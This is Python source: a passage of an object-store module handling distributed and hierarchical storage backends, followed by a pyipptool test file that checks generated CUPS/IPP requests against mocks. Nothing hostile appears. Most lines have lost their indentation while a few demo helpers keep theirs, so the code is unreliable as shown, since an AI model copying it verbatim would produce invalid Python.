Example: DistributedObjectStore, HierarchicalObjectStore
"""
def __init__(self, config, config_xml=None):
"""Extend `ObjectStore`'s constructor."""
super().__init__(config)
self.backends = {}
def shutdown(self):
"""For each backend, shuts them down."""
for store in self.backends.values():
store.shutdown()
super().shutdown()
def _exists(self, obj, **kwargs):
"""Determine if the `obj` exists in any of the backends."""
return self._call_method("_exists", obj, False, False, **kwargs)
def file_ready(self, obj, **kwargs):
"""Determine if the file for `obj` is ready to be used by any of the backends."""
return self._call_method("file_ready", obj, False, False, **kwargs)
def _create(self, obj, **kwargs):
"""Create a backing file in a random backend."""
random.choice(list(self.backends.values())).create(obj, **kwargs)
def _empty(self, obj, **kwargs):
"""For the first backend that has this `obj`, determine if it is empty."""
return self._call_method("_empty", obj, True, False, **kwargs)
def _size(self, obj, **kwargs):
"""For the first backend that has this `obj`, return its size."""
return self._call_method("_size", obj, 0, False, **kwargs)
def _delete(self, obj, **kwargs):
"""For the first backend that has this `obj`, delete it."""
return self._call_method("_delete", obj, False, False, **kwargs)
def _get_data(self, obj, **kwargs):
"""For the first backend that has this `obj`, get data from it."""
return self._call_method("_get_data", obj, ObjectNotFound, True, **kwargs)
def _get_filename(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its filename."""
return self._call_method("_get_filename", obj, ObjectNotFound, True, **kwargs)
def _update_from_file(self, obj, **kwargs):
"""For the first backend that has this `obj`, update it from the given file."""
if kwargs.get("create", False):
self._create(obj, **kwargs)
kwargs["create"] = False
return self._call_method("_update_from_file", obj, ObjectNotFound, True, **kwargs)
def _get_object_url(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its URL."""
return self._call_method("_get_object_url", obj, None, False, **kwargs)
def _get_concrete_store_name(self, obj):
return self._call_method("_get_concrete_store_name", obj, None, False)
def _get_concrete_store_description_markdown(self, obj):
return self._call_method("_get_concrete_store_description_markdown", obj, None, False)
def _get_store_by(self, obj):
return self._call_method("_get_store_by", obj, None, False)
def _repr_object_for_exception(self, obj):
try:
# there are a few objects in python that don't have __class__
obj_id = self._get_object_id(obj)
return f"{obj.__class__.__name__}({self.store_by}={obj_id})"
except AttributeError:
return str(obj)
def _call_method(self, method, obj, default, default_is_exception, **kwargs):
"""Check all children object stores for the first one with the dataset."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return store.__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default(
"objectstore, _call_method failed: %s on %s, kwargs: %s"
% (method, self._repr_object_for_exception(obj), str(kwargs))
)
else:
return default
class DistributedObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects they are created in a store selected randomly, but
with weighting.
"""
store_type = "distributed"
def __init__(self, config, config_dict, fsmon=False):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`NestedObjectStore` plus:
* distributed_object_store_config_file
:type config_xml: ElementTree
:type fsmon: bool
:param fsmon: If True, monitor the file system for free space,
removing backends when they get too full.
"""
super().__init__(config, config_dict)
self.backends = {}
self.weighted_backend_ids = []
self.original_weighted_backend_ids = []
self.max_percent_full = {}
self.global_max_percent_full = config_dict.get("global_max_percent_full", 0)
self.search_for_missing = config_dict.get("search_for_missing", True)
random.seed()
for backend_def in config_dict["backends"]:
backened_id = backend_def["id"]
maxpctfull = backend_def.get("max_percent_full", 0)
weight = backend_def["weight"]
backend = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends[backened_id] = backend
self.max_percent_full[backened_id] = maxpctfull
for _ in range(0, weight):
# The simplest way to do weighting: add backend ids to a
# sequence the number of times equalling weight, then randomly
# choose a backend from that sequence at creation
self.weighted_backend_ids.append(backened_id)
self.original_weighted_backend_ids = self.weighted_backend_ids
self.sleeper = None
if fsmon and (self.global_max_percent_full or [_ for _ in self.max_percent_full.values() if _ != 0.0]):
self.sleeper = Sleeper()
self.filesystem_monitor_thread = threading.Thread(target=self.__filesystem_monitor, args=[self.sleeper])
self.filesystem_monitor_thread.daemon = True
self.filesystem_monitor_thread.start()
log.info("Filesystem space monitor started")
@classmethod
def parse_xml(clazz, config_xml, legacy=False):
if legacy:
backends_root = config_xml
else:
backends_root = config_xml.find("backends")
backends: List[Dict[str, Any]] = []
config_dict = {
"search_for_missing": asbool(backends_root.get("search_for_missing", True)),
"global_max_percent_full": float(backends_root.get("maxpctfull", 0)),
"backends": backends,
}
for b in [e for e in backends_root if e.tag == "backend"]:
store_id = b.get("id")
store_weight = int(b.get("weight", 1))
store_maxpctfull = float(b.get("maxpctfull", 0))
store_type = b.get("type", "disk")
store_by = b.get("store_by", None)
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(b)
backend_config_dict["id"] = store_id
backend_config_dict["weight"] = store_weight
backend_config_dict["max_percent_full"] = store_maxpctfull
backend_config_dict["type"] = store_type
if store_by is not None:
backend_config_dict["store_by"] = store_by
backends.append(backend_config_dict)
return config_dict
@classmethod
def from_xml(clazz, config, config_xml, fsmon=False):
legacy = False
if config_xml is None:
distributed_config = config.distributed_object_store_config_file
assert distributed_config is not None, (
"distributed object store ('object_store = distributed') "
"requires a config file, please set one in "
"'distributed_object_store_config_file')"
)
log.debug("Loading backends for distributed object store from %s", distributed_config)
config_xml = parse_xml(distributed_config).getroot()
legacy = True
else:
log.debug("Loading backends for distributed object store from %s", config_xml.get("id"))
config_dict = clazz.parse_xml(config_xml, legacy=legacy)
return clazz(config, config_dict, fsmon=fsmon)
def to_dict(self) -> Dict[str, Any]:
as_dict = super().to_dict()
as_dict["global_max_percent_full"] = self.global_max_percent_full
as_dict["search_for_missing"] = self.search_for_missing
backends: List[Dict[str, Any]] = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backend_as_dict["id"] = backend_id
backend_as_dict["max_percent_full"] = self.max_percent_full[backend_id]
backend_as_dict["weight"] = len([i for i in self.original_weighted_backend_ids if i == backend_id])
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def shutdown(self):
"""Shut down. Kill the free space monitor if there is one."""
super().shutdown()
if self.sleeper is not None:
self.sleeper.wake()
def __filesystem_monitor(self, sleeper: Sleeper):
while self.running:
new_weighted_backend_ids = self.original_weighted_backend_ids
for id, backend in self.backends.items():
maxpct = self.max_percent_full[id] or self.global_max_percent_full
pct = backend.get_store_usage_percent()
if pct > maxpct:
new_weighted_backend_ids = [_ for _ in new_weighted_backend_ids if _ != id]
self.weighted_backend_ids = new_weighted_backend_ids
sleeper.sleep(120) # Test free space every 2 minutes
def _create(self, obj, **kwargs):
"""The only method in which obj.object_store_id may be None."""
if obj.object_store_id is None or not self._exists(obj, **kwargs):
if obj.object_store_id is None or obj.object_store_id not in self.backends:
try:
obj.object_store_id = random.choice(self.weighted_backend_ids)
except IndexError:
raise ObjectInvalid(
"objectstore.create, could not generate "
"obj.object_store_id: %s, kwargs: %s" % (str(obj), str(kwargs))
)
log.debug(
"Selected backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id)
)
else:
log.debug(
"Using preferred backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id)
)
self.backends[obj.object_store_id].create(obj, **kwargs)
def _call_method(self, method, obj, default, default_is_exception, **kwargs):
object_store_id = self.__get_store_id_for(obj, **kwargs)
if object_store_id is not None:
return self.backends[object_store_id].__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default(
"objectstore, _call_method failed: %s on %s, kwargs: %s"
% (method, self._repr_object_for_exception(obj), str(kwargs))
)
else:
return default
def __get_store_id_for(self, obj, **kwargs):
if obj.object_store_id is not None:
if obj.object_store_id in self.backends:
return obj.object_store_id
else:
log.warning(
"The backend object store ID (%s) for %s object with ID %s is invalid"
% (obj.object_store_id, obj.__class__.__name__, obj.id)
)
elif self.search_for_missing:
# if this instance has been switched from a non-distributed to a
# distributed object store, or if the object's store id is invalid,
# try to locate the object
for id, store in self.backends.items():
if store.exists(obj, **kwargs):
log.warning(
f"{obj.__class__.__name__} object with ID {obj.id} found in backend object store with ID {id}"
)
obj.object_store_id = id
return id
return None
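# A minimal standalone sketch of the weighting scheme described in __init__ above:
# each backend id is appended to a list as many times as its weight, and creation
# picks one with random.choice, so relative pick frequencies track the configured
# weights. The backend ids and weights below are made up for illustration.
def _weighted_backend_choice_demo():
    import random
    from collections import Counter

    weights = {"files1": 3, "files2": 1}  # hypothetical backend ids and weights
    weighted_ids = [bid for bid, w in weights.items() for _ in range(w)]
    picks = Counter(random.choice(weighted_ids) for _ in range(10000))
    # Expect roughly a 3:1 split between "files1" and "files2".
    return picks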
class HierarchicalObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects only the first store is used.
"""
store_type = "hierarchical"
def __init__(self, config, config_dict, fsmon=False):
"""The default constructor. Extends `NestedObjectStore`."""
super().__init__(config, config_dict)
backends: Dict[int, ObjectStore] = {}
for order, backend_def in enumerate(config_dict["backends"]):
backends[order] = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends = backends
@classmethod
def parse_xml(clazz, config_xml):
backends_list = []
for backend in sorted(config_xml.find("backends"), key=lambda b: int(b.get("order"))):
store_type = backend.get("type")
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(backend)
backend_config_dict["type"] = store_type
backends_list.append(backend_config_dict)
return {"backends": backends_list}
def to_dict(self):
as_dict = super().to_dict()
backends = []
for backend in self.backends.values():
backend_as_dict = backend.to_dict()
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def _exists(self, obj, **kwargs):
"""Check all child object stores."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return True
return False
def _create(self, obj, **kwargs):
"""Call the primary object store."""
self.backends[0].create(obj, **kwargs)
def type_to_object_store_class(store, fsmon=False):
objectstore_class: Type[ObjectStore]
objectstore_constructor_kwds = {}
if store == "disk":
objectstore_class = DiskObjectStore
elif store == "s3":
from .s3 import S3ObjectStore
objectstore_class = S3ObjectStore
elif store == "cloud":
from .cloud import Cloud
objectstore_class = Cloud
elif store == "swift":
from .s3 import SwiftObjectStore
objectstore_class = SwiftObjectStore
elif store == "distributed":
objectstore_class = DistributedObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == "hierarchical":
objectstore_class = HierarchicalObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == "irods":
from .irods import IRODSObjectStore
objectstore_class = IRODSObjectStore
elif store == "azure_blob":
from .azure_blob import AzureBlobObjectStore
objectstore_class = AzureBlobObjectStore
elif store == "pithos":
from .pithos import PithosObjectStore
objectstore_class = PithosObjectStore
else:
raise Exception(f"Unrecognized object store definition: {store}")
# Disable the Pulsar object store for now until it receives some attention
# elif store == 'pulsar':
# from .pulsar import PulsarObjectStore
# return PulsarObjectStore(config=config, config_xml=config_xml)
return objectstore_class, objectstore_constructor_kwds
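# A quick illustrative check of the dispatch above (no object store is instantiated
# here): resolving the "hierarchical" type returns the HierarchicalObjectStore class
# together with the extra constructor kwargs it expects.
def _type_dispatch_demo():
    objectstore_class, kwds = type_to_object_store_class("hierarchical", fsmon=True)
    assert objectstore_class is HierarchicalObjectStore
    assert kwds == {"fsmon": True}
    return objectstore_class, kwds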
def build_object_store_from_config(config, fsmon=False, config_xml=None, config_dict=None):
"""
Invoke the appropriate object store.
Will use the `object_store_config_file` attribute of the `config` object to
configure a new object store from the specified XML file.
Or you can specify the object store type in the `object_store` attribute of
the `config` object. Currently 'disk', 's3', 'swift', 'distributed',
'hierarchical', 'irods', and 'pulsar' are supported values.
"""
from_object = "xml"
if config is None and config_dict is not None and "config" in config_dict:
# Build a config object from to_dict of an ObjectStore.
config = Bunch(**config_dict["config"])
elif config is None:
raise Exception(
"build_object_store_from_config sent None as config parameter and one cannot be recovered from config_dict"
)
if config_xml is None and config_dict is None:
config_file = config.object_store_config_file
if os.path.exists(config_file):
if config_file.endswith(".xml") or config_file.endswith(".xml.sample"):
# This is a top level invocation of build_object_store_from_config, and
# we have an object_store_conf.xml -- read the .xml and build
# accordingly
config_xml = parse_xml(config.object_store_config_file).getroot()
store = config_xml.get("type")
else:
with open(config_file) as f:
config_dict = yaml.safe_load(f)
from_object = "dict"
store = config_dict.get("type")
else:
store = config.object_store
elif config_xml is not None:
store = config_xml.get("type")
elif config_dict is not None:
from_object = "dict"
store = config_dict.get("type")
objectstore_class, objectstore_constructor_kwds = type_to_object_store_class(store, fsmon=fsmon)
if from_object == "xml":
return objectstore_class.from_xml(config=config, config_xml=config_xml, **objectstore_constructor_kwds)
else:
return objectstore_class(config=config, config_dict=config_dict, **objectstore_constructor_kwds)
def local_extra_dirs(func):
"""Non-local plugin decorator using local directories for the extra_dirs (job_work and temp)."""
def wraps(self, *args, **kwargs):
if kwargs.get("base_dir", None) is None:
return func(self, *args, **kwargs)
else:
for c in self.__class__.__mro__:
if c.__name__ == "DiskObjectStore":
return getattr(c, func.__name__)(self, *args, **kwargs)
raise Exception(
"Could not call DiskObjectStore's %s method, does your "
"Object Store plugin inherit from DiskObjectStore?" % func.__name__
)
return wraps
def convert_bytes(bytes):
"""A helper function used for pretty printing disk usage."""
if bytes is None:
bytes = 0
bytes = float(bytes)
if bytes >= 1099511627776:
terabytes = bytes / 1099511627776
size = f"{terabytes:.2f}TB"
elif bytes >= 1073741824:
gigabytes = bytes / 1073741824
size = f"{gigabytes:.2f}GB"
elif bytes >= 1048576:
megabytes = bytes / 1048576
size = f"{megabytes:.2f}MB"
elif bytes >= 1024:
kilobytes = bytes / 1024
size = f"{kilobytes:.2f}KB"
else:
size = f"{bytes:.2f}b"
return size
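# A few illustrative values for the helper above (not from the original source);
# the thresholds are binary (1024-based), so 1536 bytes formats as kilobytes.
def _convert_bytes_demo():
    assert convert_bytes(1536) == "1.50KB"
    assert convert_bytes(1073741824) == "1.00GB"
    assert convert_bytes(None) == "0.00b"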
def config_to_dict(config):
"""Dict-ify the portion of a config object consumed by the ObjectStore class and its subclasses."""
return {
"object_store_check_old_style": config.object_store_check_old_style,
"file_path": config.file_path,
"umask": config.umask,
"jobs_directory": config.jobs_directory,
"new_file_path": config.new_file_path,
"object_store_cache_path": config.object_store_cache_path,
"gid": config.gid,
}
class ObjectStorePopulator:
"""Small helper for interacting with the object store and making sure all
datasets from a job end up with the same object_store_id.
"""
def __init__(self, has_object_store, user):
if hasattr(has_object_store, "object_store"):
object_store = has_object_store.object_store
else:
object_store = has_object_store
self.object_store = object_store
self.object_store_id = None
self.user = user
def set_object_store_id(self, data):
self.set_dataset_object_store_id(data.dataset)
def set_dataset_object_store_id(self, dataset):
# Create an empty file immediately. The first dataset will be
# created in the "default" store, all others will be created in
# the same store as the first.
dataset.object_store_id = self.object_store_id
try:
self.object_store.create(dataset)
except ObjectInvalid:
raise Exception("Unable to create output dataset: object store is full")
self.object_store_id = dataset.object_store_id # these will be the same thing after the first output
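# A minimal sketch, using made-up stand-in classes, of the behaviour described in the
# class above: the populator lets the object store pick a backend for the first
# dataset of a job and then pins every later dataset to that same backend.
def _object_store_populator_demo():
    class _FakeDataset:
        def __init__(self):
            self.object_store_id = None

    class _FakeObjectStore:
        def create(self, dataset):
            # Stand-in for a real store: assign a backend only if none is set yet.
            if dataset.object_store_id is None:
                dataset.object_store_id = "files1"

    populator = ObjectStorePopulator(_FakeObjectStore(), user=None)
    first, second = _FakeDataset(), _FakeDataset()
    populator.set_dataset_object_store_id(first)
    populator.set_dataset_object_store_id(second)
    assert first.object_store_id == second.object_store_id == "files1"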
|
test_highlevel.py
|
import os.path
import socket
import tempfile
import textwrap
import threading
import time
from future import standard_library
with standard_library.hooks():
import http.server
import socketserver
import mock
import pytest
import pyipptool
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_ipptool_create_job_subscription_pull_delivery_method(_call_ipptool):
from pyipptool import create_job_subscription
create_job_subscription(
printer_uri='https://localhost:631/printer/p',
requesting_user_name='admin',
notify_job_id=108,
notify_recipient_uri='rss://',
notify_events=('job-completed', 'job-created', 'job-progress'),
notify_attributes='notify-subscriber-user-name',
notify_charset='utf-8',
notify_natural_language='de',
notify_time_interval=1)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Create Job Subscription"
OPERATION "Create-Job-Subscription"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/printer/p
ATTR name requesting-user-name admin
GROUP subscription-attributes-tag
ATTR uri notify-recipient-uri rss://
ATTR keyword notify-events job-completed,job-created,job-progress
ATTR integer notify-job-id 108
ATTR keyword notify-attributes notify-subscriber-user-name
ATTR charset notify-charset utf-8
ATTR language notify-natural-language de
ATTR integer notify-time-interval 1
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_ipptool_create_printer_subscription(_call_ipptool):
from pyipptool import create_printer_subscription
create_printer_subscription(
printer_uri='https://localhost:631/classes/PUBLIC-PDF',
requesting_user_name='admin',
notify_recipient_uri='rss://',
notify_events='all',
notify_attributes='notify-subscriber-user-name',
notify_charset='utf-8',
notify_natural_language='de',
notify_lease_duration=0,
notify_time_interval=1)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Create Printer Subscription"
OPERATION "Create-Printer-Subscription"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/classes/PUBLIC-PDF
ATTR name requesting-user-name admin
GROUP subscription-attributes-tag
ATTR uri notify-recipient-uri rss://
ATTR keyword notify-events all
ATTR keyword notify-attributes notify-subscriber-user-name
ATTR charset notify-charset utf-8
ATTR language notify-natural-language de
ATTR integer notify-time-interval 1
ATTR integer notify-lease-duration 0
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_add_modify_printer(_call_ipptool):
from pyipptool import cups_add_modify_printer
_call_ipptool.return_value = {'Tests': [{}]}
cups_add_modify_printer(
printer_uri='https://localhost:631/classes/PUBLIC-PDF',
device_uri='cups-pdf:/',
printer_is_shared=False,
)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "CUPS Add Modify Printer"
OPERATION "CUPS-Add-Modify-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/classes/PUBLIC-PDF
GROUP printer-attributes-tag
ATTR boolean printer-is-shared 0
ATTR uri device-uri cups-pdf:/
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_add_modify_printer_with_ppd(_call_ipptool):
from pyipptool import cups_add_modify_printer
_call_ipptool.return_value = {'Tests': [{}]}
with tempfile.NamedTemporaryFile('rb') as tmp:
cups_add_modify_printer(
printer_uri='https://localhost:631/classes/PUBLIC-PDF',
device_uri='cups-pdf:/',
printer_is_shared=False,
ppd_content=tmp,
)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "CUPS Add Modify Printer"
OPERATION "CUPS-Add-Modify-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/classes/PUBLIC-PDF
GROUP printer-attributes-tag
ATTR boolean printer-is-shared 0
ATTR uri device-uri cups-pdf:/
FILE %s
}""" % tmp.name).strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_job_attributes_with_job_id(_call_ipptool):
from pyipptool import get_job_attributes
get_job_attributes(
printer_uri='https://localhost:631/classes/PUBLIC-PDF',
job_id=2)
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Job Attributes"
OPERATION "Get-Job-Attributes"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/classes/PUBLIC-PDF
ATTR integer job-id 2
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_job_attributes_with_job_uri(_call_ipptool):
from pyipptool import get_job_attributes
get_job_attributes(
job_uri='https://localhost:631/jobs/2')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Job Attributes"
OPERATION "Get-Job-Attributes"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri job-uri https://localhost:631/jobs/2
}""").strip()
assert request == expected_request, request
def test_timeout():
from pyipptool import wrapper
from pyipptool.core import TimeoutError
from pyipptool.forms import get_subscriptions_form
class Handler(http.server.BaseHTTPRequestHandler):
"""
HTTP Handler that will make ipptool waiting
"""
def do_POST(self):
time.sleep(.2)
assassin = threading.Thread(target=self.server.shutdown)
assassin.daemon = True
assassin.start()
PORT = 6789
while True:
try:
httpd = socketserver.TCPServer(("", PORT), Handler)
except socket.error as exe:
if exe.errno in (48, 98):
PORT += 1
else:
raise
else:
break
httpd.allow_reuse_address = True
thread = threading.Thread(target=httpd.serve_forever)
thread.daemon = True
thread.start()
request = get_subscriptions_form.render(
{'header':
{'operation_attributes':
{'printer_uri':
'http://localhost:%s/printers/fake' % PORT}}})
old_timeout = wrapper.config['timeout']
wrapper.config['timeout'] = .1
wrapper.config['cups_uri'] = 'http://localhost:%s/' % PORT
try:
with pytest.raises(TimeoutError):
wrapper._call_ipptool(request)
finally:
wrapper.config['timeout'] = old_timeout
def test_authentication():
from pyipptool import IPPToolWrapper
wrapper = IPPToolWrapper({'login': 'ezeep',
'password': 'secret',
'cups_uri': 'http://localhost:631/'
'printers/?arg=value'})
assert (wrapper.authenticated_uri == 'http://ezeep:secret@localhost:631/'
'printers/?arg=value')
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_release_job(_call_ipptool):
from pyipptool import release_job
_call_ipptool.return_value = {'Tests': [{}]}
release_job(job_uri='ipp://cups:631/jobs/3')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Release Job"
OPERATION "Release-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri job-uri ipp://cups:631/jobs/3
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cancel_job(_call_ipptool):
from pyipptool import cancel_job
_call_ipptool.return_value = {'Tests': [{}]}
cancel_job(job_uri='ipp://cups:631/jobs/12')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Cancel Job"
OPERATION "Cancel-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri job-uri ipp://cups:631/jobs/12
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_add_modify_class(_call_ipptool):
from pyipptool import cups_add_modify_class
_call_ipptool.return_value = {'Tests': [{}]}
cups_add_modify_class(printer_uri='ipp://cups:631/classes/p',
printer_is_shared=True)
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Add Modify Class"
OPERATION "CUPS-Add-Modify-Class"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/classes/p
GROUP printer-attributes-tag
ATTR boolean printer-is-shared 1
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_delete_printer(_call_ipptool):
from pyipptool import cups_delete_printer
_call_ipptool.return_value = {'Tests': [{}]}
cups_delete_printer(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Delete Printer"
OPERATION "CUPS-Delete-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_delete_class(_call_ipptool):
from pyipptool import cups_delete_class
_call_ipptool.return_value = {'Tests': [{}]}
cups_delete_class(printer_uri='ipp://cups:631/classes/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Delete Class"
OPERATION "CUPS-Delete-Class"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/classes/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_classes(_call_ipptool):
from pyipptool import cups_get_classes
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_classes()
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get Classes"
OPERATION "CUPS-Get-Classes"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_printers(_call_ipptool):
from pyipptool import cups_get_printers
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_printers()
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get Printers"
OPERATION "CUPS-Get-Printers"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_devices(_call_ipptool):
from pyipptool import cups_get_devices
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_devices()
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get Devices"
OPERATION "CUPS-Get-Devices"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_ppd_with_printer_uri(_call_ipptool):
from pyipptool import cups_get_ppd
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_ppd(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get PPD"
OPERATION "CUPS-Get-PPD"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_ppd_with_ppd_name(_call_ipptool):
from pyipptool import cups_get_ppd
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_ppd(ppd_name='ppd-for-my-printer')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get PPD"
OPERATION "CUPS-Get-PPD"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR name ppd-name ppd-for-my-printer
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_ppds(_call_ipptool):
from pyipptool import cups_get_ppds
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_ppds()
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get PPDs"
OPERATION "CUPS-Get-PPDs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_move_job(_call_ipptool):
from pyipptool import cups_move_job
_call_ipptool.return_value = {'Tests': [{}]}
cups_move_job(job_uri='ipp://cups:631/jobs/12',
job_printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Move Job"
OPERATION "CUPS-Move-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri job-uri ipp://cups:631/jobs/12
GROUP job-attributes-tag
ATTR uri job-printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_reject_jobs(_call_ipptool):
from pyipptool import cups_reject_jobs
_call_ipptool.return_value = {'Tests': [{}]}
cups_reject_jobs(printer_uri='ipp://cups:631/printers/p',
requesting_user_name='boby')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Reject Jobs"
OPERATION "CUPS-Reject-Jobs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
ATTR name requesting-user-name boby
GROUP printer-attributes-tag
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_jobs(_call_ipptool):
from pyipptool import get_jobs
_call_ipptool.return_value = {'Tests': [{}]}
get_jobs(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Jobs"
OPERATION "Get-Jobs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
